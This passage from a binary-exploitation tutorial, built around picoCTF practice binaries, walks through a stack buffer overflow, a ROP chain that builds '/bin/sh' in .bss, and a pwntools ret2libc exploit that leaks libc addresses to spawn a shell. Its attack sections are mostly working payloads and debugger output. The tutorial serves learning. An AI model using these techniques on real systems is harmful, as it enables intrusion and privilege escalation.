91 | Now you'll notice that two of these are in the binary. I'll just pick the first one and run with it. Finally, our finished exploit looks like so:
92 | 
93 | ```shell
94 | ./overflow $(python -c 'print "A"*40 + "\xd0\x83\x04\x08" + "FAKE" +
95 | "\x3a\x86\x04\x08"')
96 | ```
97 | 


--------------------------------------------------------------------------------
/intro-2/README.md:
--------------------------------------------------------------------------------
  1 | # Intro  2: Screwing around with the stack.
  2 | 
  3 | **Credit to [Picoctf 2013](https://2013.picoctf.com) for the binary and source used here.**
  4 | 
  5 | Now that you've gotten your feet wet with binaries, it's time to dive in to exploitation with the stack. Consider the file [overflow1.c](overflow1.c)
  6 | 
  7 | ```C
  8 | #include <stdio.h>
  9 | #include <stdlib.h>
 10 | #include <string.h>
 11 | #include <unistd.h>
 12 | #include <sys/types.h>
 13 | #include "dump_stack.h"
 14 | 
 15 | void vuln(int tmp, char *str) {
 16 |     int win = tmp;
 17 |     char buf[64];
 18 |     strcpy(buf, str);
 19 |     dump_stack((void **) buf, 23, (void **) &tmp);
 20 |     printf("win = %d\n", win);
 21 |     if (win == 1) {
 22 |         execl("/bin/sh", "sh", NULL);
 23 |     } else {
 24 |         printf("Sorry, you lose.\n");
 25 |     }
 26 |     exit(0);
 27 | }
 28 | 
 29 | int main(int argc, char **argv) {
 30 |     if (argc != 2) {
 31 |         printf("Usage: stack_overwrite [str]\n");
 32 |         return 1;
 33 |     }
 34 | 
 35 |     uid_t euid = geteuid();
 36 |     setresuid(euid, euid, euid);
 37 |     vuln(0, argv[1]);
 38 |     return 0;
 39 | }
 40 | ```
 41 | 
 42 | You can tell just by reading through this file that the obvious objective here is to make `win == 1` a true statement, but we're going to ignore that for a few minutes to learn about the stack. The stack is dynamic memory that the program uses to store addresses, arguments, and all sorts of other goodies.
 43 | 
 44 | Here's an example stack dump:
 45 | 
 46 | ```salt
 47 | $ ./overflow1-3948d17028101c40
 48 | Usage: stack_overwrite [str]
 49 | $ ./overflow1-3948d17028101c40 AAAA
 50 | Stack dump:
 51 | 0xffd48bf4: 0xffd4a89b (second argument)
 52 | 0xffd48bf0: 0x00000000 (first argument)
 53 | 0xffd48bec: 0x0804870f (saved eip)
 54 | 0xffd48be8: 0xffd48c18 (saved ebp)
 55 | 0xffd48be4: 0xf7720000
 56 | 0xffd48be0: 0xf762caa7
 57 | 0xffd48bdc: 0x00000000
 58 | 0xffd48bd8: 0xffd48c44
 59 | 0xffd48bd4: 0xf7744500
 60 | 0xffd48bd0: 0xffd48c18
 61 | 0xffd48bcc: 0x00000000
 62 | 0xffd48bc8: 0x00000000
 63 | 0xffd48bc4: 0xf7720000
 64 | 0xffd48bc0: 0xffffffff
 65 | 0xffd48bbc: 0xf760b216
 66 | 0xffd48bb8: 0x000000c2
 67 | 0xffd48bb4: 0xf757f698
 68 | 0xffd48bb0: 0xf7751938
 69 | 0xffd48bac: 0xf762cad4
 70 | 0xffd48ba8: 0x000003e8
 71 | 0xffd48ba4: 0x000003e8
 72 | 0xffd48ba0: 0xffd48c00
 73 | 0xffd48b9c: 0x41414141 (beginning of buffer)
 74 | win = 0
 75 | Sorry, you lose.
 76 | ```
 77 | 
 78 | Now if you know a thing or two about ASCII, you'll know that `0x41` is the value of the character `A`. At the bottom of the stack dump, you'll notice that the beginning of the buffer contains `0x41414141`, or our four `A`'s. Now we can run it again, only this time we'll store a few more `A`'s. Pay attention to the addresses on the left :)
 79 | 
 80 | ```salt
 81 | $ ./overflow1-3948d17028101c40 $(python -c 'print "A"*76')
 82 | Stack dump:
 83 | 0xfff577d4: 0xfff58853 (second argument)
 84 | 0xfff577d0: 0x00000000 (first argument)
 85 | 0xfff577cc: 0x0804870f (saved eip)
 86 | 0xfff577c8: 0xfff57700 (saved ebp)
 87 | 0xfff577c4: 0x41414141
 88 | 0xfff577c0: 0x41414141
 89 | 0xfff577bc: 0x41414141
 90 | 0xfff577b8: 0x41414141
 91 | 0xfff577b4: 0x41414141
 92 | 0xfff577b0: 0x41414141
 93 | 0xfff577ac: 0x41414141
 94 | 0xfff577a8: 0x41414141
 95 | 0xfff577a4: 0x41414141
 96 | 0xfff577a0: 0x41414141
 97 | 0xfff5779c: 0x41414141
 98 | 0xfff57798: 0x41414141
 99 | 0xfff57794: 0x41414141
100 | 0xfff57790: 0x41414141
101 | 0xfff5778c: 0x41414141
102 | 0xfff57788: 0x41414141
103 | 0xfff57784: 0x41414141
104 | 0xfff57780: 0x41414141
105 | 0xfff5777c: 0x41414141 (beginning of buffer)
106 | win = 1094795585
107 | Sorry, you lose.
108 | ```
109 | 
110 | This shell command: `$(python -c 'print "A"*76')` tells python to print out the `A` character 76 times.
111 | 
112 | Notice that the addresses on the left are completely different than the first run. This is normal, and due to something called `ASLR`, or Address Space Layout Randomization. Most modern OSes have `ASLR` enabled, which is protection that randomizes stack addresses on each run of a program.
113 | 
114 | Now, you might notice that `win = 1094795585` according to the stack dump. What just happened?
115 | 
116 | Back to the source:
117 | 
118 | ```C
119 | char buf[64];
120 | strcpy(buf, str);
121 | ```
122 | 
123 | **`strcpy()` is a dangerous function!**
124 | 
125 | Our buffer only holds 64 bytes, however, the buffer we ask to be copied contains 76 bytes. `strcpy()` doesn't care about checking lengths, so the extra 12 bytes that don't fit just get thrown onto the stack.
126 | 
127 | The value of `win` was stored right next to our buffer, so next let's try to set the value of `win` to `1`.
128 | 
129 | This is where things get a bit tricky...
130 | 
131 | We need to be careful not to confuse characters and integers. The character `1` is `0x31` in hex, but the integer `1` is `0x1` in hex (note that this is not a printable character).
132 | 
133 | We want to set `win` equal to the *integer* representation of `1`, not the character representation of `1`.
134 | 
135 | Since `win` is right after our buffer on the stack, we can just write 64 `A`'s in character format, followed by a single `"\x01"` to our buffer. The 65th byte (`0x01`) overflows the buffer and spills into the memory where `win` is stored, setting `win = 1`.
136 | 
137 | ```salt
138 | $ ./overflow1-3948d17028101c40 $(python -c 'print "A"*64 + "\x01"')
139 | Stack dump:
140 | 0xffe29f04: 0xffe2b85e (second argument)
141 | 0xffe29f00: 0x00000000 (first argument)
142 | 0xffe29efc: 0x0804870f (saved eip)
143 | 0xffe29ef8: 0xffe29f28 (saved ebp)
144 | 0xffe29ef4: 0xf7760000
145 | 0xffe29ef0: 0xf766caa7
146 | 0xffe29eec: 0x00000001
147 | 0xffe29ee8: 0x41414141
148 | 0xffe29ee4: 0x41414141
149 | 0xffe29ee0: 0x41414141
150 | 0xffe29edc: 0x41414141
151 | 0xffe29ed8: 0x41414141
152 | 0xffe29ed4: 0x41414141
153 | 0xffe29ed0: 0x41414141
154 | 0xffe29ecc: 0x41414141
155 | 0xffe29ec8: 0x41414141
156 | 0xffe29ec4: 0x41414141
157 | 0xffe29ec0: 0x41414141
158 | 0xffe29ebc: 0x41414141
159 | 0xffe29eb8: 0x41414141
160 | 0xffe29eb4: 0x41414141
161 | 0xffe29eb0: 0x41414141
162 | 0xffe29eac: 0x41414141 (beginning of buffer)
163 | win = 1
164 | $ ls
165 | overflow1-3948d17028101c40  overflow1-3948d17028101c40.c  README.md
166 | $ exit
167 | ```
168 | 
169 | If you try this for yourself, you'll get a shell. You've now successfully executed a buffer overflow attack!
170 | 


--------------------------------------------------------------------------------
/exercise-3/README.md:
--------------------------------------------------------------------------------
  1 | # Follow the Yellow Brick Functions
  2 | 
  3 | In this problem, I smartened up. Nowhere in the binary will you find `"/bin/sh"`
  4 | 
  5 | ```C
  6 | # include<stdio.h>
  7 | # include<string.h>
  8 | int main(int argc, char **argv) {
  9 |     putenv("PATH=");
 10 |     printf("I've broken up my system call!\n");
 11 |     printf("You think I've included what you need for this? You wish\n");
 12 |     char user_buf[64]= "";
 13 |     if (argc > 1) {
 14 |         strcpy(user_buf,argv[1]);
 15 |     }
 16 |     else {
 17 |         printf("usage: ./overflow [input]\n");
 18 |         return 0;
 19 |         }
 20 |     char buf1[10] = "/b";
 21 |     char buf2[8] = "in/";
 22 |     char buf3[5] = "date";
 23 |     strcat(buf2,buf3);
 24 |     strcat(buf1,buf2);
 25 |     system(buf1);
 26 |     printf("Aren't these string functions wonderful?\n");
 27 |     return 0;
 28 | }
 29 | ```
 30 | 
 31 | As you'll remember from the previous exercise, putting `"/bin/sh"` in the binary was a mistake. This problem is geared very similarly with a little bit of extra finesse. First things first, we'll find the offset of `%eip`
 32 | 
 33 | ```gdb
 34 | $ strace ./overflow $(python -c 'print "A"*76 + "BBBB"')
 35 | ...
 36 | --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
 37 | ```
 38 | 
 39 | After 76 bytes we have `%eip`! From here we have to get a bit clever. If you take anything from this exercise, it's this: **If a function is in the binary and PIE is not enabled, you have access to the function.** This means we have access to the `strcat()` and `strcpy()` functions. We can use these to cleverly get ourselves a shell.
 40 | 
 41 | Now, for a quick introduction to the `.bss` segment. `.bss` refers to the part of data memory used by many compilers and linkers for holding statically-allocated variables that are not explicitly initialized to any value. Regardless of what the program uses the `.bss` segment for, know that it's a scratch pad for hackers. We can use it to reliably store data when the stack is randomized. We could use the GOT, but it might mess up functions we need. Knowing this, how can we get a shell?
 42 | 
 43 | The answer lies in the functions used. We have the strings `"/b"` and `"in/"` in the binary. We also have `"sh"` at the end of the second print statement! :D
 44 | 
 45 | Let's use `objdump` to get some function addresses:
 46 | 
 47 | ```objdump
 48 | $ objdump -d overflow | grep ">:"
 49 | ...
 50 | 08048370 <strcat@plt>:
 51 | 08048380 <strcpy@plt>:
 52 | ...
 53 | 080483a0 <system@plt>:
 54 | ```
 55 | 
 56 | Next, we will need to find the start of the `.bss` segment:
 57 | 
 58 | ```gdb
 59 | $ gdb -q ./overflow
 60 | Reading symbols from ./overflow...(no debugging symbols found)...done.
 61 | gdb-peda$ info address __bss_start
 62 | Symbol "__bss_start" is at 0x804a030 in a file compiled without debugging.
 63 | ```
 64 | 
 65 | Now our exploit (abstractly) is as follows:
 66 | 
 67 | ```c
 68 | strcpy(&bss, &"/b" );
 69 | strcat(&bss, &"in/");
 70 | strcat(&bss,&"sh");
 71 | system(&bss)
 72 | ```
 73 | 
 74 | We'll need the addresses of strings in the binary:
 75 | 
 76 | ```gdb
 77 | $ gdb -q ./overflow
 78 | Reading symbols from ./overflow...(no debugging symbols found)...done.
 79 | gdb-peda$ b*main
 80 | Breakpoint 1 at 0x80484dd
 81 | gdb-peda$ r
 82 | Starting program: /vagrant/how2exploit_binary/overflow-3/overflow
 83 | Breakpoint 1, 0x080484dd in main ()
 84 | gdb-peda$ find "/b" binary
 85 | Searching for '/b' in: binary ranges
 86 | Found 2 results, display max 2 items:
 87 | overflow : 0x804854e (<main+113>:   das)
 88 | overflow : 0x804954e --> 0x622f ('/b')
 89 | gdb-peda$ find "in/" binary
 90 | Searching for 'in/' in: binary ranges
 91 | Found 2 results, display max 2 items:
 92 | overflow : 0x8048565 (<main+136>:   imul   $0x2444c700,0x2f(%esi),%ebp)
 93 | overflow : 0x8049565 --> 0x2f6e69 ('in/')
 94 | gdb-peda$ find "sh" binary
 95 | Searching for 'sh' in: binary ranges
 96 | Found 2 results, display max 2 items:
 97 | overflow : 0x80486ce --> 0x75006873 ('sh')
 98 | overflow : 0x80496ce --> 0x75006873 ('sh')
 99 | ```
100 | 
101 | Now that we have everything we need, we can learn one more important concept: Chaining Functions. If you only need to call one function to get a shell, you don't need to chain. Otherwise, we need to chain functions.
102 | 
103 | In order to chain functions together we need to somehow remove the arguments from the stack. As you know from before, standard x86 function calls look like:
104 | 
105 | \[function address\] \[return address\] \[arg1\] \[arg2\] ...
106 | 
107 | The first function will run, then execution continues at the return address, and then the program will SEGFAULT when it tries to run the argument as code. We can't have the program trying to run our arguments, so we need to pop them off of the stack.
108 | 
109 | This requires the use of Return Oriented Programming, or a ROP exploit. ROP uses any set of instructions in a binary that ends with a `ret` instruction. In order to find these, you can use `ropshell.com`, `gdb-peda`, or `ROPgadget`. We need a `pop;pop;ret` gadget since we need to pop two arguments off of the stack for every function call except system. Since system is our last call, we don't need a `pop;ret` gadget for it.
110 | 
111 | I'm using `gdb-peda` in this example.
112 | 
113 | ```gdb
114 | $ gdb -q ./overflow
115 | Reading symbols from ./overflow...(no debugging symbols found)...done.
116 | gdb-peda$ b*main
117 | Breakpoint 1 at 0x80484dd
118 | gdb-peda$ r
119 | Starting program: /vagrant/how2exploit_binary/overflow-3/overflow
120 | ...
121 | Breakpoint 1, 0x080484dd in main ()
122 | gdb-peda$ ropsearch "" binary
123 | Searching for ROP gadget: '' in: binary ranges
124 | ...
125 | 0x0804863e : (b'5f5dc3')    pop %edi; pop %ebp; ret
126 | ```
127 | 
128 | Luckily for us, the binary has the gadget we need! Chaining functions will take
129 | this form in our exploit (and future ones, too!)
130 | 
131 | \[&function\] \[&rop_gadget\] \[&arg1\] \[&arg2\] \[&next_function\]
132 | 
133 | You can use any number of arguments as long as you have a rop gadget with the same number of pops.
134 | 
135 | Let's give the exploit a try:
136 | 
137 | ```
138 | ./overflow $(python -c 'print "A"*76 +
139 | "\x80\x83\x04\x08" + "\x3e\x86\x04\x08" + "\x30\xa0\x04\x08" +
140 | "\x4e\x95\x04\x08" + "\x70\x83\x04\x08" + "\x3e\x86\x04\x08" +
141 | "\x30\xa0\x04\x08" + "\x65\x95\x04\x08" + "\x70\x83\x04\x08" +
142 | "\x3e\x86\x04\x08" + "\x30\xa0\x04\x08" + "\xce\x96\x04\x08" +
143 | "\xa0\x83\x04\x08" + "FAKE" + "\x30\xa0\x04\x08"')
144 | ```
145 | 
146 | The layout of the exploit looks like the following:
147 | 
148 | ```
149 | <overflow> +
150 | <strcpy> + <pop pop ret> + <bss_start>
151 | <"/b"> + <strcat> + <pop pop ret>
152 | <bss_start> + <"in/"> + <strcat>
153 | <pop pop ret> + <bss_start> + <"sh">
154 | <system> + <FAKE> + <bss_start>
155 | ```
156 | 
157 | 
158 | You should get a shell, although you won't be able to do much as we didn't set privs. The concept, however, still stands.
159 | 


--------------------------------------------------------------------------------
/exercise-4/README.md:
--------------------------------------------------------------------------------
  1 | # Pay your local library a visit
  2 | 
  3 | At this point you're probably used to hunting through binaries for useful functions or code that you can use to get a shell. But what do you do without a call to `system()`?
  4 | 
  5 | The simple answer: get a shell anyways. :)
  6 | 
  7 | The long answer is a bit more complicated. This attack is called a "Return to `libc`", or `ret2libc` for short. If you don't remember the PLT and GOT from before, now is a good time to check the [glossary](../terms) and maybe do some googling. You'll recall that ASLR randomizes the libc address, but the good news is that with arbitrary `read()` and `write()` calls, you can easily circumvent this.
  8 | 
  9 | This binary has what we call Dynamic Input, which is some super fancy ego-inflating jargon that means we can change inputs in the same program. Basically any program where you can trigger the vulnerability twice (or more) with different exploits in the same run is dynamic. If it still doesn't make sense, just stay tuned.
 10 | 
 11 | If you haven't already, run through [Exercise 3.5: Intro to pwntools](../exercise-3.5)
 12 | 
 13 | Seriously, go do that.
 14 | 
 15 | Now that you've made it this far, I'll give a brief overview of this style of exploit. The libc functions that the PLT stubs call aren't just some magical ethereal functions. They're real and they're mapped to a real page in memory with an address that you can call if you're clever. **The entire libc is mapped into the process's memory.** From here, we exploit the fact that truly randomizing everything is computationally expensive. Instead, ASLR only randomizes the **base address** of the libc. This means that `&function_1 - &function_2` is constant as long as you're using the same libc file. With this in mind, the goal is to leak (`write()`) the address of some libc function to stdout. We then take that address, compute the address of `system()`, call `main()` (or whatever function contains the vulnerability) again, and call `system()` with the newly computed address.
 16 | 
 17 | Still confused? I was when I first learned this, but I'll try to explain as I go.
 18 | 
 19 | First, we have to calculate the offset of `%eip`
 20 | 
 21 | ```shell
 22 | $ python -c 'print "A"*140 + "BBBB"' | strace ./exercise-4
 23 | ...
 24 | --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
 25 | ```
 26 | 
 27 | After `140 bytes`, we have `%eip`
 28 | 
 29 | From here, we need to leak the address of a `libc` function.
 30 | 
 31 | We can do this by calling `write(1, &function, 4)`
 32 | 
 33 | I'll be using the GOT address of `read()` (remember that the GOT is an array of pointers into libc)
 34 | 
 35 | ```objdump
 36 | $ objdump -d exercise-4 | grep ">:"
 37 | ...
 38 | 08048370 <write@plt>:
 39 | ...
 40 | 
 41 | $ objdump -R exercise-4
 42 | ...
 43 | 0804a00c R_386_JUMP_SLOT   read
 44 | ...
 45 | ```
 46 | 
 47 | With these addresses, we get the following exploit.
 48 | 
 49 | ```shell
 50 | python -c 'print "A"*140 + "\x70\x83\x04\x08" + "RETN" +
 51 | "\x01\x00\x00\x00"+ "\x0c\xa0\x04\x08" + "\x04\x00\x00\x00"' | ./exercise-4
 52 | ```
 53 | 
 54 | If you go ahead and run this a few times, you'll get some weird outputs:
 55 | 
 56 | ```shell
 57 | �+o�Segmentation fault (core dumped)
 58 | �kh�Segmentation fault (core dumped)
 59 | ��n�Segmentation fault (core dumped)
 60 | ```
 61 | 
 62 | The four bytes before the SEGFAULT are the libc address.
 63 | 
 64 | From here, we're going to run:
 65 | 
 66 | ```shell
 67 | $ ldd exercise-4
 68 |     linux-gate.so.1 =>  (0xf76f9000)
 69 |     libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf753c000)
 70 |     /lib/ld-linux.so.2 (0xf76fa000)
 71 | ```
 72 | 
 73 | Since this is a local binary challenge, the `libc` file is just going to be whatever the standard one is on your computer. **The same binary running on a different machine could have a different `libc`, and therefore give you different results.**
 74 | 
 75 | All we have to do is grab a copy of that `libc` and put it in our directory. If you ever exploit a remote binary and you don't have the `libc`, there are plenty of places you can get them online.
 76 | 
 77 | ```shell
 78 | $ cp /lib/i386-linux-gnu/libc.so.6 ./
 79 | ```
 80 | 
 81 | Now we need `pwntools`.
 82 | 
 83 | We'll start our script off with the typical items:
 84 | 
 85 | ```Python
 86 | from pwn import *
 87 | context(arch='i386', os='linux') # <-- Add the architecture and os
 88 | binary = ELF("exercise-4")
 89 | libc = ELF("libc.so.6")
 90 | 
 91 | r = process("./exercise-4")
 92 | ```
 93 | 
 94 | After this, we know we'll need the `read()`, `write()`, the GOT address of `read()`, and a `pop; ret` ropgadget, so we add these in.
 95 | 
 96 | ```python
 97 | write_plt = p32(binary.symbols["write"])
 98 | read_GOT = p32(binary.symbols["got.read"])
 99 | read_plt = p32(binary.symbols["read"])
100 | bss_addr = p32(binary.symbols["__bss_start"])
101 | pop_ret = "\x9d\x85\x04\x08"
102 | ```
103 | 
104 | Now the binary outputs a line first, so we add:
105 | 
106 | ```python
107 | r.recvline()
108 | ```
109 | 
110 | Now we should start building our exploit. We want to try to avoid using the escape strings from before; doing so makes for nicer code and forces you to use `pwntools` the right way.
111 | 
112 | ```python
113 | exploit = "A"*140                                               # EIP offset
114 | exploit += write_plt +pop_ret +  p32(1)+ read_GOT + p32(4)      # Call to write()
115 | exploit += p32(binary.symbols["main"])                          # Call main() again to retrigger the vulnerability
116 | 
117 | ```
118 | 
119 | Now we want to send the first payload:
120 | 
121 | ```python
122 | r.sendline(exploit)
123 | ```
124 | 
125 | Now here's the cool part. Since we know that the program prints out the address of `read()` in the `libc` (remember those funky bytes from earlier before the SEGFAULT?) we can take those and calculate the base address of `libc`. This indirectly means that we can call any function in the standard library.
126 | 
127 | ```python
128 | addr_read = int(r.recv(4)[::-1].encode("hex"),16)
129 | r.recvline()
130 | libc_base = addr_read - libc.symbols["read"]
131 | system = p32(libc_base + libc.symbols["system"])
132 | ```
133 | 
134 | Let's break down my hacky `addr_read` line.
135 | 
136 | 1. `recv()` 4 bytes from `r`
137 | 2. Reverse those bytes (because of little-endian encoding) and convert them to hex
138 | 3. Parse that as an integer.
139 | 
140 | Voila! We now have the address of `read()` in `libc`.
141 | 
142 | From there, we subtract `read()`'s offset within the libc file, giving us the base address for this runtime. In the last line, we add the offset of `system()` in the libc to our calculated base. This gives us the address of `system()` for this runtime.
143 | 
144 | The best part of this whole show is that the pesky `"/bin/sh"` string we need is in `libc`! We can calculate the address of that as well!
145 | 
146 | ```python
147 | binsh = p32(libc_base +  libc.search("/bin/sh").next())
148 | ```
149 | 
150 | Now all we've got to do is send our exploit with some extra padding (it was 140 before, but now it's 148 since we overflow from before the stack frame) and we get a shell.
151 | 
152 | ```python
153 | r.sendline("A"*148+ system + "RETN" + binsh + binsh) # <- 148?????? why 148?
154 | r.interactive()
155 | ```
156 | 


--------------------------------------------------------------------------------